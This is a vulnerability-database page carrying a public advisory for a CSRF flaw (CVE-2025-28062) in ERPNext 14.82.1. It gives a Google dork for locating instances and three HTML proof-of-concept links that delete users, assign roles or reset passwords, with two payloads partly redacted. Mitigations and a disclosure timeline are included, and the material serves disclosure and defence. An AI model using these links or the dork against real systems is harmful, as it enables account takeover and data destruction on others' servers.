Vulners
Lucene search
ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF)
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2025-28062 | 5 May 202520:03 | – | circl |
 | ERPNext 跨站请求伪造漏洞 | 5 May 202500:00 | – | cnnvd |
 | ERPNext Cross-Site Request Forgery Vulnerability | 14 May 202500:00 | – | cnvd |
 | CVE-2025-28062 | 5 May 202500:00 | – | cve |
 | CVE-2025-28062 | 5 May 202500:00 | – | cvelist |
 | EUVD-2025-13459 | 3 Oct 202520:07 | – | euvd |
 | CVE-2025-28062 | 5 May 202516:15 | – | nvd |
 | CVE-2025-28062 | 5 May 202516:15 | – | osv |
 | 📄 ERPNext 14.82.1 Cross Site Request Forgery | 6 May 202500:00 | – | packetstorm |
 | PT-2025-19726 · Erpnext · Erpnext | 5 May 202500:00 | – | ptsecurity |
10
# Exploit Title: ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF)
# Google Dork: inurl:"/api/method/frappe"
# Date: 2025-04-29
# Exploit Author: Ahmed Thaiban (Thvt0ne)
# Vendor Homepage: https://erpnext.com
# Software Link: https://github.com/frappe/erpnext
# Version: <= 14.82.1, 14.74.3 (Tested)
# Tested on: Linux (Ubuntu 20.04), Chrome, Firefox.
# CVE : CVE-2025-28062
# Category: WebApps
# Description:
A Cross-Site Request Forgery (CSRF) vulnerability Lead to Account Takeover exists in ERPNext 14.82.1 and 14.74.3. This flaw allows an attacker to perform unauthorized state-changing operations on behalf of a logged-in administrator without their knowledge or consent.
Affected endpoints include:
- /api/method/frappe.desk.reportview.delete_items
- /api/method/frappe.desk.form.save.savedocs
Impact:
- Deletion of arbitrary users
- Unauthorized role assignment
- Account takeover via password change
The application fails to enforce CSRF tokens on administrative API requests, violating OWASP recommendations.
---
# PoC 1: Delete a User
<html>
<body>
<h2>Delete User</h2>
<a href="http://target/api/method/frappe.desk.reportview.delete_items?items=%5B%221%401.com%22%5D&doctype=User">
Click Here
</a>
</body>
</html>
---
# PoC 2: Assign Role
<html>
<body>
<h2>Assign Role to User</h2>
<a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
Add Role
</a>
</body>
</html>
---
# PoC 3: Reset Password
<html>
<body>
<h2>Reset User Password</h2>
<a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
Reset Password
</a>
</body>
</html>
---
# Mitigation:
- Enforce CSRF protection for all administrative endpoints
- Require POST methods for state changes
- Mark cookies as SameSite=Strict
- Implement re-authentication for critical user changes
---
# Disclosure Timeline:
- 2025-02-09: Vulnerability discovered
- 2025-02-10: Reported to Frappe (no response)
- 2025-04-29: Public disclosure via CVE + advisory
---
# Author Contact:
LinkedIn: https://linkedin.com/in/ahmedth
GitHub: https://github.com/Thvt0ne
# References:
- https://owasp.org/www-community/attacks/csrfData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 May 2025 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.18.1
EPSS0.00224
SSVC